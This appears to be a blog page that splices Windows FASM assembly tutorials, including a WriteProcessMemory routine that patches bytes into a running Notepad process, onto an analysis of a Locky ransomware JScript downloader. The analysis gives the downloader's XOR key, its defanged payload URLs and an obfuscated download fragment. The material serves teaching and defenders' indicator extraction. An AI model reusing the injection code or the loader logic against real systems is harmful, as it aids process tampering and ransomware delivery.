hSnapshot      dd ?
prcs           PROCESSENTRY32
 
PrcList        db 'calc.exe',0
Privilege      db 'SeDebugPrivilege',0
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                advapi32,'ADVAPI32.DLL',\
                shell32,'SHELL32.DLL'
 
include 'API\kernel32.inc'
include 'API\advapi32.inc'
include 'API\shell32.inc'

III. WriteProcessMemory

format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
proc start
 
        invoke FindWindow, NULL, WindowTitle           ; Find the window titled 'Notepad'
        test eax,eax                                   ; Test whether a window with that title was found or not
        jnz .ju1                                       ; Don't jump = The window was not found
        invoke MessageBox,0, message1, caption, MB_OK  ; - Display an error message (Window not found)
        jmp .exit                                      ; - Exit the application
.ju1:                                                  ; Jumped     = The window was found
        invoke GetWindowThreadProcessId, eax, ProcID   ; Get the ProcessID via the window handle
        invoke OpenProcess, 0x1F0FFF, FALSE, [ProcID]  ; Open the process using PROCESS_ALL_ACCESS (0x1F0FFF) and get a handle
        mov dword[ProcHandle],eax                      ; Save the handle
 
        ; VirtualAllocEx: Reserves/commits a region of memory within the virtual address space of out target process
        ; We should do this in order to avoid potential access violations (which might cause crashes)
        invoke VirtualAllocEx,dword [ProcHandle], 0, patchSize, MEM_COMMIT, PAGE_READWRITE
        cmp eax, 0                                     ; EAX == 0 : Failed to reserve the memory region
        jnz .cont                                      ; EAX != 0 : Continue with further steps
        invoke MessageBox,0, message4, caption, MB_OK  ; Display an error: VirtualAllocEx failed to reserve the memory region
        jmp .exit                                      ; Exit the application
.cont:
        invoke WriteProcessMemory, dword[ProcHandle], dword[startAddress], patchBytes, patchSize, patchResult
        cmp [patchResult],patchSize                    ; Compare the number of patched bytes with the length of our new bytes
        je .ju2                                        ; Don't jump = Failed to patch the target
        invoke MessageBox,0, message3, caption, MB_OK  ; - Display an error message (An error occured)
        jmp .exit                                      ; - Exit the application
.ju2:                                                  ; Jumped     = Target patched successfully.
        invoke MessageBox,0, message2, caption, MB_OK  ; Display: The target has been patched successfully
.exit:                                                 ; Jumper: Here we're going to exit our application
        invoke  ExitProcess, 0                         ; ExitProcess
 
endp
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
WindowTitle     db 'Notepad', 0                        ; Holds the window title   of the target application
ProcID          dd ?                                   ; Holds the process ID     of the target application
ProcHandle      db ?                                   ; Holds the process handle of the target application
 
caption         db 'Information', 0                    ; The caption displayed in all MessageBoxes
message1        db 'Unable to find the window', 0      ; Message: Window not found
message2        db 'Patched successfully',0            ; Message: Target patched successfully
message3        db 'Patching: An error occured',0      ; Message: An error occured while patching the target
message4        db 'VirtualAllocEx failed',0           ; Message: Failed to successfully execute VirtualAllocEx
 
startAddress    dd 0x00401090                          ; The memory address we're starting to write from
patchBytes      db 0x2F,0x66                           ; These bytes will be written into the memory of our target executable
patchSize       =  $ - patchBytes                      ; Holds the number of bytes we're going to write
patchResult     dd ?                                   ; Holds the number of successfully written bytes
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                user32,'USER32.DLL'
 
import          kernel32,\
                ExitProcess,'ExitProcess',\
                OpenProcess,'OpenProcess',\
                VirtualAllocEx, "VirtualAllocEx",\
                WriteProcessMemory,'WriteProcessMemory'
 
import          user32,\
                FindWindow,'FindWindowA',\
                GetWindowThreadProcessId,'GetWindowThreadProcessId',\
                MessageBox,'MessageBoxA'

IV. Copy a file

format PE GUI 4.0
entry start
 
include 'win32ax.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
proc start
        mov [lpFileOp.wFunc],FO_COPY             ; We want the shell to copy a file
        mov [lpFileOp.fFlags],FOF_SILENT         ; .. silently
        mov [lpFileOp.pFrom],SzFileFrom          ; The file which is going to be copied
        mov [lpFileOp.pTo],SzFileTo              ; The name of the new file
 
        invoke SHFileOperationA,lpFileOp         ; Execute the operation
 
        invoke ExitProcess,NULL                  ; Exit this program
endp
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
FO_COPY    = 2
FOF_SILENT = 4
SzFileFrom db 'source.txt',0
SzFileTo   db 'target.txt',0
 
struct  SHFILEOPSTRUCT
        hWnd dd ?
        wFunc dd ?
        pFrom dd MAX_PATH
        pTo dd MAX_PATH
        fFlags dw ?
        fAnyOperationsAborted dd ?
        hNameMappings dd ?
        lpszProgressTitle dd ?
ends
 
lpFileOp SHFILEOPSTRUCT
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                shell32,'SHELL32.DLL'
 
import          kernel32,\
                ExitProcess,'ExitProcess'
 
import          shell32,\
                SHFileOperationA,'SHFileOperationA'

V. Read a file

format pe console 4.0
include 'WIN32AX.INC'
 
.data
        FileTitle db 'file.txt',0
        hFile dd ?
        nSize dd ?
        lpBytesRead dd ?
        lpBuffer rb 8192
 
        MessageBoxCaption db 'Output:',0
.code
        main:
        invoke  CreateFile, FileTitle, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 ; Open the file (to get its handle)
        ; TODO: TestApiError
        mov [hFile], eax ; Save the file's handle to hFile
        invoke  GetFileSize, [hFile], 0 ; Determine the file size
        ; TODO: TestApiError
        mov [nSize], eax ; Save the file size given by EAX
        invoke  ReadFile, [hFile], lpBuffer, [nSize], lpBytesRead, 0 ; Now read the full file
        ; TODO: TestApiError
        invoke CloseHandle, [hFile] ; Handle should be closed after the file has been read
        invoke MessageBox, NULL, addr lpBuffer, addr MessageBoxCaption, MB_OK ; Easy way of outputing the text
        invoke  ExitProcess, 0
 
.end main

VI. Write a file

format pe console 4.0
include 'WIN32AX.INC'
 
.data
 buf db 'TEST'
 bufsize = $ - buf
 byteswritten dd ?
.code
 main:
 invoke  CreateFile, 'test.txt', GENERIC_WRITE, 0, 0, 4, FILE_ATTRIBUTE_NORMAL, 0
 invoke  WriteFile, eax, buf, bufsize, byteswritten, 0
 invoke  ExitProcess, 0
 
.end main

Trojan-Downloader:JS/Locky: Deobfuscate and Extract IOCs

Source: https://www.flashpoint-intel.com/anatomy-locky-zepto-ransomware/
Goal: Assist analysts with decoding and obtain relevant information from Locky HTA Application (HTA) and Windows Script File (WSF) JSCRIPT loaders.

GitHub repo: https://github.com/vkremez/Locky/blob/master/README.md

Locky ransomware was notorious for its usage of the second-stage JavaScript and Windows Script File JSCRIPT in its spray-and-pray attacks.

These are classic simple XOR-ed .wsf/.hta SCRIPT payloads used by this gang.

For example, let’s take a look at the following Locky HTA JSCRIPT loader:

3d91a6ffed8b038363a0ead0f8985d1bdf88ba543aff0bcab048819d70455073.jscript.

Padding word:

LICIZAX

XOR Key:

b6vYxEjsTYwJ7mIrZz4WFSGHeaddkwbq

Payload URI: (*remove padding word and decode Base64):

goldenladywedding[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS
www[.]jmetalloysllp[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS
livewebsol[.]com/vdG76VUY76rjnu?CHhjpz=zhXHhhwS

Filename in %TEMP%/AppData/ (launched by rundll32.exe with ‘qwerty’) :

NqmXYsBdh[.]dll

Here is the relevant function right below the eval() one:

var brigadabrigadalalapolicMOTALO2HORDA17 = “NqmXYsBdh”;var brigadabrigadalalapolicTRAxKey = brigadabrigadalalapolicMOTALO2fsta(“b6vYxEjsTYwJ7mIrZz4WFSGHeaddkwbq”);var brigadabrigadalalapolicMOTALO2_a5 = [“Z29sZGVubGFkeLICIZAXXdlZGRpbmcuY29tL3ZkRzc2VlVZNzZyam51”,“dLICIZAX3d3LmptZXRhbGxveXNsbHAuYLICIZAX29tL3ZkRzc2VlVZNzZyam51”,“bGl2ZXdlYnNvbC5jb20vdmRHLICIZAXNzZWVVk3NnJqbnU=”]; var brigadabrigadalalapolicMOTALO2HORDAI = 0;for(brigadabrigadalalapolicMOTALO2HORDA5 in brigadabrigadalalapolicMOTALO2_a5){brigadabrigadalalapolicMOTALO2HORDAI++;try{var brigadabrigadalalapolicMOTALO2HORDA6 =brigadabrigadalalapolicMOTALO2_bChosteck.brigadabrigadalalapolicMRADXHO() + brigadabrigadalalapolicMOTALO2_a5[brigadabrigadalalapolicMOTALO2HORDA5].brigadabrigadalalapolicMRADXHO() + “?CHhjpz=zhXHhhwS”;
if(brigadabrigadalalapolicMOTALO2_a2(brigadabrigadalalapolicMOTALO2HORDA6,brigadabrigadalalapolicMOTALO2HORDA17+brigadabrigadalalapolicMOTALO2HORDAI)){
break;

Please take a look at the following GitHub page with the Python script to decode Locky JSCRIPT loaders and obtain payload indicators of compromise:
https://github.com/vkremez/Locky/blob/master/README.md
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000; min-height: 12.0px} p.p3 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; color: #d12f1b; -webkit-text-stroke: #d12f1b; min-height: 12.0px} p.p4 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; color: #bb2ca2; -webkit-text-stroke: #bb2ca2; min-height: 12.0px} p.p5 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; color: #d12f1b; -webkit-text-stroke: #d12f1b} p.p6 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; color: #bb2ca2; -webkit-text-stroke: #bb2ca2} li.li1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Georgia; -webkit-text-stroke: #000000} span.s1 {font-kerning: none} span.s2 {font-kerning: none; color: #bb2ca2; -webkit-text-stroke: 0px #bb2ca2} span.s3 {font-kerning: none; color: #d12f1b; -webkit-text-stroke: 0px #d12f1b} span.s4 {font-kerning: none; -webkit-text-stroke: 0px #000000} span.s5 {font-kerning: none; color: #272ad8; -webkit-text-stroke: 0px #272ad8} ul.ul1 {list-style-type: disc}

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…